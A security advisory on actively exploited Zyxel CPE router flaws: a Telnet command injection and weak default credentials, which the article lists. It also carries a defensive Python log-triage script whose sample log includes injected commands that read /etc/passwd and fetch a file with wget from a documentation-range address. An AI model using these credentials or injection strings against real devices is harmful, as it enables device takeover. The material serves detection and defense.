
Security researchers have identified serious vulnerabilities in Zyxel CPE Series devices that are being actively exploited. VulnCheck identified the flaws in July 2024, and GreyNoise has since confirmed active exploitation attempts in the wild.
Key Vulnerabilities:
1. CVE-2024-40891:
– A command injection in the Telnet interface, exploitable by any authenticated user
– Stems from improper command validation in libcms_cli.so
– Shell metacharacters in a CLI command reach the underlying shell, giving arbitrary command execution on the device
2. CVE-2025-0890:
– Weak default credentials: admin:1234, zyuser:1234 and supervisor:zyad1234
– The supervisor account carries hidden privileges that grant full system access
– Even the zyuser account can trigger CVE-2024-40891, so the two flaws chain into remote code execution using nothing more than the published defaults
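A triage script for the two issues above, added here as an example and not code from Zyxel, VulnCheck or GreyNoise: it scans a constructed, simplified Telnet event log for logins with the listed default credentials (CVE-2025-0890) and for CLI commands carrying shell metacharacters (CVE-2024-40891), and flags a command that follows a default-credential login from the same source as the full chain. The credential pairs and CVE numbers come from the advisory; the log format, the metacharacter set and the sample commands are assumptions.

```python
import re
from dataclasses import dataclass

# Weak default credential pairs named in CVE-2025-0890, as (user, password).
DEFAULT_CREDENTIALS = {
    ("admin", "1234"),
    ("zyuser", "1234"),
    ("supervisor", "zyad1234"),
}

# Shell metacharacters that turn a CLI argument into additional shell commands.
# Assumption: the page does not list which characters the vulnerable CLI passes
# through, so this covers the usual separators, substitutions and redirections.
SHELL_METACHARS = re.compile(r"[;&|`$()<>{}\n]")

# Constructed event format (not Zyxel's syslog): one event per line, either
#   <timestamp> <source-ip> LOGIN user=<name> pass=<password>
#   <timestamp> <source-ip> CMD <command line typed into the Telnet CLI>
LOGIN_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) LOGIN user=(?P<user>\S+) pass=(?P<pw>\S*)$")
CMD_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) CMD (?P<cmd>.*)$")


@dataclass(frozen=True)
class Finding:
    ts: str
    src: str
    cve: str
    detail: str


def analyze(lines):
    """Return a Finding for every default-credential login and every Telnet
    command containing shell metacharacters; a command that follows a default
    credential login from the same source is flagged as the full chain."""
    findings = []
    default_login = {}  # source ip -> account that authenticated with a default password

    for raw in lines:
        line = raw.rstrip("\n")

        m = LOGIN_RE.match(line)
        if m:
            user, pw = m["user"], m["pw"]
            if (user, pw) in DEFAULT_CREDENTIALS:
                default_login[m["src"]] = user
                note = f"login with default credential {user}:{pw}"
                if user == "supervisor":
                    note += " (hidden account with full system access)"
                findings.append(Finding(m["ts"], m["src"], "CVE-2025-0890", note))
            continue

        m = CMD_RE.match(line)
        if m:
            hits = sorted(set(SHELL_METACHARS.findall(m["cmd"])))
            if hits:
                note = f"shell metacharacters {hits} in Telnet command {m['cmd']!r}"
                user = default_login.get(m["src"])
                if user:
                    note += f"; follows default-credential login as {user} (full chain)"
                findings.append(Finding(m["ts"], m["src"], "CVE-2024-40891", note))

    return findings


# Constructed sample events for a dry run: two attacker sources chaining the
# flaws, and one legitimate administrator whose password has been changed.
SAMPLE_LOG = """\
2025-02-04T10:00:01Z 198.51.100.7 LOGIN user=zyuser pass=1234
2025-02-04T10:00:03Z 198.51.100.7 CMD ping 8.8.8.8; cat /etc/passwd
2025-02-04T10:05:10Z 203.0.113.9 LOGIN user=supervisor pass=zyad1234
2025-02-04T10:07:22Z 192.0.2.5 LOGIN user=admin pass=S3cure!Pass
2025-02-04T10:07:30Z 192.0.2.5 CMD ping 8.8.8.8
2025-02-04T10:09:00Z 203.0.113.9 CMD ping `wget http://203.0.113.9/x -O /tmp/x`
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"{f.ts} {f.src} {f.cve}: {f.detail}")
```

Because Telnet is plaintext, a network tap or a Telnet-aware proxy in front of the CPE can produce events of this shape; adapt the two regular expressions to whatever your collector actually emits. Any hit on the supervisor account deserves immediate attention given its hidden full-system privileges.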
Impact and Exposure:
– Over 1,500 affected devices are exposed to the internet
– Impacts multiple end-of-life (EOL) products
– Affected models include VMG1312-B10A/B/E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500
Zyxel’s Response:
– No patches will be issued for the affected devices
– Zyxel recommends replacing them with newer, supported models
– Zyxel confirms the devices reached EOL status years ago
VulnCheck demonstrated successful exploitation against a VMG4325-B10A running firmware version 1.00(AAFR.4)C0_20170615. With no fix coming, the only durable remedy is to replace the affected devices; until that happens, operators should at least make sure the Telnet management interface is not reachable from the internet.